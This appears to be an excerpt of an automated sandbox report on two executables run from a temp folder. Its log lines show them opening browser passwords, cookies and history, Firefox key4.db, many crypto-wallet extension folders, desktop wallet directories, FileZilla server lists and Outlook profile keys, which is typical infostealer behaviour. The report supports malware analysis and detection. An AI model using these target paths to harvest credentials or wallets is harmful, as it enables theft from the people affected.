                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQEN
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQEN
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
